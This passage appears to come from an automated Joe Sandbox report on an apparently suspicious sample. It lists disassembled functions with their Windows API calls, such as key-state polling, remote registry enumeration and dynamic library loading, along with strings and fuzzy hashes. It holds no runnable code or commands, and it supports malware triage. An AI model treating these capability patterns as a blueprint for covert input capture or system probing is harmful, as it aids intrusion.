Instruction ID: 35f5873eefe12a8ce9462e3945def6877e938b22488134469b5545f995afaaef
Opcode Fuzzy Hash: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
Instruction Fuzzy Hash: 63218174604209ABDF209F29DC05AAA77E8EF44724F205A1AFDE0E73D0E7709852CB50

Function 00ED710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00ED712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED715D
GetStdHandle.KERNEL32(000000F6), ref: 00ED716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00ED71A8

Strings

nul, xrefs: 00ED71A3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
Instruction ID: a1bc860f726371eebc923e9590a0bf2e7f56816f5ef5f3abed715404dc3e6ef8
Opcode Fuzzy Hash: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
Instruction Fuzzy Hash: EE21A175605206ABDB209F699C04AAAB7E8EF55724F201B1AFCF0F73D0E7709842CB51

Function 00EDAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EDAF13
__swprintf.LIBCMT ref: 00EDAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00EFF910), ref: 00EDAF6A

Strings

%lu, xrefs: 00EDAF26

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
Instruction ID: a940ed22884414dbe638867ab3cc282b9d87032ba83ca842bf5a8700abc948e7
Opcode Fuzzy Hash: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
Instruction Fuzzy Hash: 62216030A00209AFCB10DB65C985DAE7BF8EF89704B0040A9F909BB352DB71EA45CB21

Function 00ECA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

Part of subcall function 00ECA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
Part of subcall function 00ECA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
Part of subcall function 00ECA37C: GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
Part of subcall function 00ECA37C: AttachThreadInput.USER32(00000000), ref: 00ECA3BA

GetFocus.USER32 ref: 00ECA554

Part of subcall function 00ECA3C5: GetParent.USER32(?), ref: 00ECA3D3

GetClassNameW.USER32(?,?,00000100), ref: 00ECA59D
EnumChildWindows.USER32(?,00ECA615), ref: 00ECA5C5
__swprintf.LIBCMT ref: 00ECA5DF

Strings

%s%d, xrefs: 00ECA5D9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
Instruction ID: 2539261973b604c3c07a198cd5eb4d2d28b6854a08052351e9e8f2f095062ece
Opcode Fuzzy Hash: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
Instruction Fuzzy Hash: 2011A271600308ABDF107F64DD85FFE77B8AF89708F085079FA18BA192CA7159468B75

Function 00ED2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00ED2048

Strings

REMOVE, xrefs: 00ED204E
EXISTS, xrefs: 00ED2070
APPEND, xrefs: 00ED2081
KEYS, xrefs: 00ED205F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
Instruction ID: 6dd0eb3e0c391d54921a5284d4cc747cff82acdf8c8e39af85dd59e5c43aa51d
Opcode Fuzzy Hash: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
Instruction Fuzzy Hash: 03115B309001198FCF00EFA4D9514EEB7F4FF25304B54986AD855B7352EB32691BDB51

Function 00EEEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EEF07E
CloseHandle.KERNEL32(?), ref: 00EEF0FF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
Instruction ID: b027f8f48297d5290bbbe286d2046331c4377c6e08bba0da3700ea6b5767d13a
Opcode Fuzzy Hash: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
Instruction Fuzzy Hash: 92814E716043019FD720DF29C886B6AB7E5EF88720F14982DF999EB292DB70AD40CB51

Function 00EF02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EF040E
RegCloseKey.ADVAPI32(?,?), ref: 00EF043A
RegCloseKey.ADVAPI32(00000000), ref: 00EF0447

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
Instruction ID: 2e489be1ed560afb63f989b34fb2d33b24280af48785290845fbafc3ca5d242d
Opcode Fuzzy Hash: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
Instruction Fuzzy Hash: 8E513A31208204AFD704EF64C881E7EB7E9FF84314F44992EF699A7292DB31E905CB52

Function 00EEDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00EEDCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00EEDCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00EEDD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDD35

Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
Instruction ID: 4467aa36dab96b5c9670e3df1d6c27908c97f22bc703f4075831882c03728512
Opcode Fuzzy Hash: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
Instruction Fuzzy Hash: CD512435A042099FCB01EFA9C8849ADF7F4EF48324B15D069E819AB362DB70AD45CF91

Function 00EDE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EDE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EDE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EDE8F2

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EDE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EDE91F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: aef8509de4a65d9680243520d7f314824bab2fe017829735e543b81b5a3e6936
Instruction ID: 0b723947f190294ab5952262815eb5ea3d16a2eefa4fbea8ec9b57d549e9f96b
Opcode Fuzzy Hash: aef8509de4a65d9680243520d7f314824bab2fe017829735e543b81b5a3e6936
Instruction Fuzzy Hash: 45512835A00205EFDF05EF64C985AAEBBF5EF48314B1490A9E909BB362DB31ED11DB50

Function 00EFA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
Instruction ID: 49c0d6bbcf9801b128074110ab43017e9f191c9809a43c162c3c2f4ed4046a0e
Opcode Fuzzy Hash: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
Instruction Fuzzy Hash: F541E3B590110CAFC710DB28CC44FBDBBA5EB09314F195175EA29BB2E1D770AD41DA51

Function 00E72344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E72357
ScreenToClient.USER32(00F367B0,?), ref: 00E72374
GetAsyncKeyState.USER32(00000001), ref: 00E72399
GetAsyncKeyState.USER32(00000002), ref: 00E723A7

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
Instruction ID: ba190f1c86b2fa13795951724431315d7e0e365961b8672004555c489c71b461
Opcode Fuzzy Hash: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
Instruction Fuzzy Hash: D041813590411AFFDF159F68CC44AE9BBB4FF49324F20931AF928B62A0C7346954DBA1

Function 00EC6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00EC69A9
TranslateMessage.USER32(?), ref: 00EC69D2
DispatchMessageW.USER32(?), ref: 00EC69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC69EB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
Instruction ID: dee1c91b7e5e54cb32c37cc3879af8a3252a0fa81c3856ac0bcdef0f773d4eb3
Opcode Fuzzy Hash: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
Instruction Fuzzy Hash: 2A31C531504246AEDB20CF75CD44FB77BA9AF45318F10916DE421E21A1DB36D88BE7A0

Function 00EC8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EC8F12
PostMessageW.USER32(?,00000201,00000001), ref: 00EC8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EC8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00EC8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EC8FDA

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
Instruction ID: df7913d166dbd16b402bbb6fd2d27dac8da50c1ec251e63a522ecf91fe3394d7
Opcode Fuzzy Hash: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
Instruction Fuzzy Hash: DD31BC7160025DEFDB14CF68DB48BAE7BA6EB44315F10422DF924E62D0CBB19914CB91

Function 00ECB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00ECB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ECB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ECB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ECB742
_wcsstr.LIBCMT ref: 00ECB74C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 96a1dcb2d927d8fd2a781070d36f9cba781c702c3ec41114b32fa48f33440eba
Instruction ID: 4feb311ad456050645c5766631b345b40afad219e6bebd605d11933a819c868f
Opcode Fuzzy Hash: 96a1dcb2d927d8fd2a781070d36f9cba781c702c3ec41114b32fa48f33440eba
Instruction Fuzzy Hash: 07210732204204BAEB255B79DD4AF7B7BACDF85750F00516EFC05EA1A1EF62CC41D6A0

Function 00EFB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

GetWindowLongW.USER32(?,000000F0), ref: 00EFB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EFB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EFB489
GetSystemMetrics.USER32(00000004), ref: 00EFB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EE1184,00000000), ref: 00EFB4D0

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
Instruction ID: 581e0dc0ce17a22a051f233e8d215417ffffcf311e639d38b0a81de86d1bed5e
Opcode Fuzzy Hash: ae874e243061dbe0c59642a66ad738ff2bc362162d233a878630d6bb4beb5585
Instruction Fuzzy Hash: 23218071910219AFCB208F39CD04A7A37A5EF09725F149728FA36E61E1F7309810DB80

Function 00EC97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC9802

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9834
__itow.LIBCMT ref: 00EC984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC9874
__itow.LIBCMT ref: 00EC9885

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
Instruction ID: bfff67bce479448297f3d264bde16ef5b4390b24e7004284bdf71ae30fcdf77d
Opcode Fuzzy Hash: 751249cbe77ca97f3bc7a3caa07e7d75519597d20ad792422fa5d01df4f1fe62
Instruction Fuzzy Hash: D921D632700204ABDB149A619D8AFEE3BE8EF4A714F046029F904FB242DA718D46C7D1

Function 00E712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
SelectObject.GDI32(?,00000000), ref: 00E7135C
BeginPath.GDI32(?), ref: 00E71373
SelectObject.GDI32(?,00000000), ref: 00E7139C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
Instruction ID: ff6a280ad29b6520507bb42e9f6be264f50622efb16aacf5f269158096583a37
Opcode Fuzzy Hash: 8ba815a5b194f42e08b85cdf206bca239699764fd14a52cb9c746c9a139bc091
Instruction Fuzzy Hash: E7212870800308FFDB119F29DC04BAD7BAAEF08325F15C266F918A61A1D7719995EBA0

Function 00ECC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00ECC176
_memcmp.LIBCMT ref: 00ECC194
_memcmp.LIBCMT ref: 00ECC1A7
_memcmp.LIBCMT ref: 00ECC1BF
_memcmp.LIBCMT ref: 00ECC1D7

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
